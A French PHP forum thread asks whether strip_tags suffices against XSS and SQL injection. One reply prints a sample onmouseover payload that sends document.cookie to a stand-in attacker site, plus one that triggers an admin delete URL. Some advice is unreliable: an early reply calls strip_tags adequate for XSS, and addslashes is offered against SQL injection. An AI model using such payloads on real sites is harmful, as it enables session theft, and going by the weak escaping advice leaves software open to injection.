IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

strip_tags fonction suffisante ?


Sujet :

Langage PHP

  1. #1
    Membre confirmé

    Profil pro
    Inscrit en
    Janvier 2008
    Messages
    786
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2008
    Messages : 786
    Points : 602
    Points
    602
    Par défaut strip_tags fonction suffisante ?
    Bonjour je récupère mon texte de ma base de donnée dans un script php.
    Et je souhaite laissez quelques possibilités tel que <strong>,<li>...

    Donc je veux savoir si cette fonction est suffisante pour se protéger contre les xss et sql ??

    Merci

  2. #2
    Membre habitué
    Homme Profil pro
    Développeur Web
    Inscrit en
    Avril 2007
    Messages
    121
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Avril 2007
    Messages : 121
    Points : 136
    Points
    136
    Par défaut
    Regarde la doc et elle répondra à tes questions.

    Cette fonction protège bien vu qu'elle supprime les balise mais attention elle ne protège que des faille XSS, pas des injections SQL.

  3. #3
    Membre confirmé
    Avatar de Tesing
    Profil pro
    Étudiant
    Inscrit en
    Septembre 2009
    Messages
    272
    Détails du profil
    Informations personnelles :
    Âge : 41
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Enseignement

    Informations forums :
    Inscription : Septembre 2009
    Messages : 272
    Points : 453
    Points
    453
    Par défaut
    Hello,

    ca n'est pas suffisant si l'utilisateur peut soumettre directement du texte contenant des tags HTML comme strong.
    Il pourrait injecter du javascript, par exemple dans les gestionnaires d'évènement de ces balises :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <strong onmouseover="document.href.location='http://sitepirate.com/' + document.cookie">Owned </strong>
    Ou encore faire exécuter des actions non voulues a un utilisateur qui en aurait les droits si tu as par exemple des pages de suppression qui utilise la méthode GET.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <strong onmouseover="document.href.location='http://tonsite.com/admin/product/delete/1''">Owned </strong>
    Il faudrait supprimer les attributs des balises que tu laisses passer.

    De plus comme le signale IGStaff, tu n'es pas protégé contre les injections SQL, si tu utilises MySQL il faudra faire appel par exemple a mysql_real_escape_string pour échapper les entrées utilisateurs, ou encore addslashes.

  4. #4
    Membre confirmé

    Profil pro
    Inscrit en
    Janvier 2008
    Messages
    786
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2008
    Messages : 786
    Points : 602
    Points
    602
    Par défaut re
    D'accord merci mais comment je fais pour protéger de failles xss ??

    Car j'utilise tinymce.. et j'arrive pas à parser correctement :s !!

    Merci

  5. #5
    Membre confirmé

    Profil pro
    Inscrit en
    Janvier 2008
    Messages
    786
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2008
    Messages : 786
    Points : 602
    Points
    602
    Par défaut re
    Sinon j'ai fait avec xssme une analyse et :

    j'ai 0 failure
    20 warnings
    et 20 passed

    c'est gravee???

Discussions similaires

  1. Réponses: 8
    Dernier message: 12/02/2013, 01h08
  2. Réponses: 4
    Dernier message: 17/07/2007, 22h30
  3. Implémentation des fonctions mathématiques
    Par mat.M dans le forum Mathématiques
    Réponses: 9
    Dernier message: 17/06/2002, 16h19
  4. fonction printf
    Par ydeleage dans le forum C
    Réponses: 7
    Dernier message: 30/05/2002, 11h24
  5. FOnction api specifiant la position de la souris
    Par florent dans le forum C++Builder
    Réponses: 4
    Dernier message: 15/05/2002, 20h07

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo